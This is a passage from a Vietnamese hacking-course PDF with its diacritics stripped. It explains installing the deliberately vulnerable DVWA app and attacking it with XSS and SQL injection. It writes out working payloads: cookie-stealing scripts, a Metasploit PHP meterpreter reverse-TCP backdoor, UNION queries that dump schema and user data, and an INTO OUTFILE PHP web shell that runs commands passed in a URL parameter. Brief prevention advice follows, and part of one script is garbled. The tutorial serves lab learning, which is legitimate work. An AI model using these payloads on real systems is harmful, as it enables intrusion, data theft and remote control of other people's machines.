mt Web ca OWASP. Trnh t mc low n high c th p ng nhu cu hack ca
rt nhiu ngi.
Vy DVWA l mt ng dng web PHP / MySQL b li. Mc tiu chnh ca n
l gip cho cc chuyn gia an ninh kim tra k nng v cng c ca h trong mt mi
trng hp php, gip cc nh pht trin web hiu r hn v cc qu trnh m bo cc
ng dng web v h tr gio vin / hc sinh ging dy / hc bo mt ng dng web
trong mt mi trng lp hc.
II. Hng dn ci t DVWA trn Backtrack
Do y l framework trn nn php nn n gin cc chng ta dng
webserver bng XAMPP trc, ri copy DVWA vo, chng ta s s dng DVWA trn
giao din web.
1. Ti v ci t XAMPP
V y l phn mm m ngun m, nn cc chng ta hy vo trang ch ca
XAMPP http://www.apachefriends.org/en/xampp.html ti phin bn mi nht v
my.

87

Sau khi download XAMPP v, cc chng ta vo Terminal v g lnh nh
hnh bn di

Khi ng XAMPP ln

88

Sau cng l m trnh duyt web ln v g http://localhost ta s c giao din
chnh ca XAMPP nh hnh bn di:

2. Ti v ci t DVWA
Cc chng ta vo link http://www.dvwa.co.uk/ ti DVWA v my

89

Sau tin hnh gii nn file va download v v t vo th mc
/opt/lampp/htdocs/

Vo trnh duyt web v g http://localhost/dvwa/ ta c giao din chnh ca
DVWA nh sau :

90

Ch :
Phi bt XAMPP ln trc th mi c th chy DVWA.
Ti giao din ng nhp ca DVWA, cc chng ta ng nhp bng
acc/pass mc nh l admin/password.
Chun b trc khi tn cng:
M trnh duyt web, g: localhost/dvwa. C th s dng dia_chi_ip/dvwa

91

khai thc cc li trn DVWA(XSS, SQL Injection), chng ta phi thit lp
Security Level l Low. V khi , nhng on code c thm vo s c gi
nguyn. Vi mc High, s dng hm htmlspecialchars() chuyn cc k t c bit,
khng ging vi lc nhp ban u. mc Medium, chui <script> s b xa i nn
khng bi nh hng. Tuy nhin, cc th html khc vn b nh hng bnh thng.
V th chng ta thit lp Security Level l low: Chn DVWA Security -> Low
-> Submit

92

III. Cc k thut tn cng trn DVWA
1. XSS (Cross-Site Scripting)
a) Gii thiu
Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS
trnh nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng
bng cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay
nhng on m script nguy him c th gy nguy hi cho nhng ngi s dng khc.
Trong , nhng on m nguy him c chn vo hu ht c vit bng cc
Client-Site Script nh JavaScript, JScript, DHTML v cng c th l c cc th
HTML.
XSS l mt trong nhng li ph bin, c rt nhiu trang web b mc phi li
ny, chnh v th ngy cng c nhiu ngi quan tm n li ny!
b) Phn loi XSS
XSS c th c phn loi nh sau:
Stored XSS Attacks

Stored XSS l hnh thc tn cng m cho php k tn cng c th chn
mt on script nguy him (thng l Javascript) vo website ca chng ta thng qua
mt chc nng no (vd: vit li bnh, guestbook, gi bi..), t khi cc thnh
vin khc truy cp website s b dnh m c t k tn cng ny, cc m c ny
thng c lu li trong database ca website chng ta nn gi l Stored. Stored XSS
pht sinh do chng ta khng lc d liu do thnh vin gi ln mt cch ng n,
khin cho m c c lu vo Database ca website.

93

Reflected XSS Attacks

Trong hnh thc ny, k tn cng thng gn thm on m c vo URL ca
website chng ta v gi n nn nhn, nu nn nhn truy cp URL th s b dnh m
c. iu ny xy ra do ta khng ch filter input t URL ca website mnh.
XSS Attack Consequences
Phng php ny tng t nh 2 phng php trn. Tuy nhin, im khc bit
l cch m payload c a ti server. Mt site read only hay brochureware
cng c thn him XSS. XSS c th gy thit hi t mc nh n ln nh vic
chim ti khon ca ngi s dng. Mt cuc tn cng XSS c th ly c session
cookie, gy mt ti khon s dng. Hoc c th nh hng ti d liu ngi dng u
cui bng cch ci t Trojan, hoc redirect trang web ngi truy cp sang mt trang
khc, hoc thay i ni dung ca mt trang.
c) Tm hiu v hot ng XSS
V c bn, hot ng ca XSS c th c m t nh sau:

94

M t hot ng ca XSS
Theo nguyn tc trn, mt hacker c th li dng cc l hng bo mt t
mt website. Cc th HTML u c th l cng c cho cc cuc tn cng bi k thut
XSS, trong 2 th IMG v IFRAME c th cho php trnh duyt load thm cc
website khc khi cc lnh HTML c hin th. Li dng nguyn tc ny, cc hacker
c th chn cc on m c vo v khin my nn nhn b tn cng XSS
d) Tc hi ca XSS
XSS thng c s dng vi cc mc ch sau:
nh cp thng tin
Gip hacker c th truy cp c vo nhng thng tin nhy cm
Ly c quyn truy cp min ph vo nhng ni dung ng ra phi tr
tinmi c c
D xt s thch ca ngi s dng mng
Thay i din mo ( deface) mt trang web no
Tn cng t chi dch v (DoS)
M JavaScript c c th truy cp bt c thng tin no sau y:
- Cookie c nh (ca site b li XSS) c duy tr bi trnh duyt.
- RAM Cookie (ca site b li XSS).
- Tn ca tt c cc ca s c m t site b li XSS.
- Bt c thng tin m c th truy cp c t DOM hin ti (nh
value, m HTML).

95

e) Tn cng XSS
Thc hin script: <script>alert(XSS); </script> hin thng bo trn trnh
duyt web

Kt qu nhn c thay v ch lu vo c s d liu:

Xem cookie ca ngi dng:
<script>alert(document.cookie); </script>

96

Chng ta c th gi cookie ny v trc tip my tn cng thay v ch hin ln
mn hnh.
Chng ta c th chn cc th iframe vo:
<iframe src=http://www.ctu.edu.vn></iframe>

Ngoi ra, chng ta c th s dng Metasploit Framework (gii thiu trn)
tn cng chim quyn iu khin cng vi backdoor cho php my tnh mc tiu kt
ni li. Code to backdoor:
Msfpayload php/meterperter/reverse_tcp lhost=192.168.10.102 lport=4444
R > forum.php

97

Dng msfconsole v thit lp cc thng s cn thit lng nghe kt ni trn
server:

Tr li XSS Stored, ta s dng script:

98

<script>
Windows.
</script>

Sau khi thc thi script trn xong, Metasploit Framework m kt ni n v
chng ta c th tn cng.

Mt s hnh nh tn cng:

99

100

f) Mt s phng php phng nga v ngn chn
Ngi ta khng lng ht c mc nguy him ca XSS nhng cng khng
qu kh khn ngn nga XSS. C rt nhiu cch c th gii quyt vn ny.
OWASP (The Open Web Application Standard Project) ni rng c th xy dng
cc website bo mt cao, i vi cc d liu ca ngi s dng, nn:
Ch chp nhn nhng d liu hp l.
T chi nhn cc d liu hng.
Lin tc kim tra v thanh lc d liu.
Nhng ngi pht trin web c th bo v website ca mnh khi b li dng
thng qua tn cng XSS, bng cch m bo nhng trang pht sinh ng khng cha
cc tag ca script bng cch lc v xc nhn hp l cc d liu u vo t pha ngi
dng hoc m ha(endcoding) v lc cc gi tr xut cho ngi dng.
2. SQL Injection
a) SQL Injection l g?
SQL Injection l mt trong nhng kiu hack web ang dn tr nn ph bin
hin nay. Bng cch inject cc m SQL query/command vo input trc khi chuyn
cho ng dng web x l, chng ta c th login m khng cn username v password,
remote execution, dump data v ly root ca SQL server. Cng c dng tn cng l
mt trnh duyt web bt k, chng hn nh Internet Explorer, Firefox, Google Chrome,
...

101

b) Cc bc khai thc l hng trang web
Vo trang http://localhost/dvwa/, chn SQL Injection (Blind):

Chng ta bt u khai thc li t nhp liu User ID:
Nhp vo: 1

Nu nhp vo:1 or 1=1hoc 1 or =#ta c kt qu rt bt ng

102

Du # c s dng loi b tc dng ca du () sau cng trong cu lnh
truy vn sql:
SELECT first_name, last_name FROM users WHERE user_id =
$user_id
Xem tn c d liu: a UNION select 1, database();#

Xem user v system user: a UNION select system_user(), user();#

103

Xc nh tn user m ngi dng ang s dng v phin bn ca MySQL

Xem tt c cc tn c s d liu cng cc bng c trong h qun tr csdl
MySQL:
a UNION select table_schema, table_name, from
information_schema.tables;#

Chng ta c th thm mnh iu kin WHERE gii hn li kt qu
a UNION select table_schema, table_name, from information_schema.tables
where table_schema=dvwa;#

104

Lit k cc column trong bng:
a UNION select table_name, column_name, from
information_schema.columns where table_schema=dvwa;#

Tip tc thc hin cu lnh sau:
' union select '','<?php $print=shell_exec($_GET["cmd"]); echo
"<pre>$print</pre>"; ?>' into outfile C:\\xampp\\htdocs\\sqlinjection.php' ;#
Sau khi tao xong, chng ta ch cn thc hin lnh trn trnh duyt, pha sau chui
?cmd=cu lnh. V d: 192.168.10.20/sqlinjection.php?cmd=dirta c:

105

By gi ta c ton quyn iu khin my tnh ca victim.
a) Cc phng n phng chng SQL Injection
i password mc nh ca user root
Xo tt c cc th tc c mc nh lu tr trn server
Lc nhng k t c th gy hi nh ,,,:,# ngay t khi nhn yu cu truy
vn t bn ngoi
Update SQL vi nhng bn mi nht
Kho cc t kha nhy cm i vi SQL bng cch dng firewall chn ngay t
u vo
M ha password
Loi b nhng t kha SELECT, DELETE, INSERT, trong cu truy vn t
bn ngoi.

106

TI LIU THAM KHO

[1] McGraw Hill Osborne,Media Hacking Exposed Sixth Edition Network
Security Secrets And SolutionsJan 2009
[2] Gordon Fyodor Lyon, Nmap Network Scanning: The Official Nmap
Project Guide to Network Discovery and Security Scanning
[3] www.wikipedia.org
[4] www.google.com.vn

Athena-Su Dung BackTrack 5 de Khai Thac Lo Hong Mang PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Athena-Su Dung BackTrack 5 de Khai Thac Lo Hong Mang PDF

Uploaded by

Copyright:

Available Formats

1

TI LIU HNG DN V S DNG

You might also like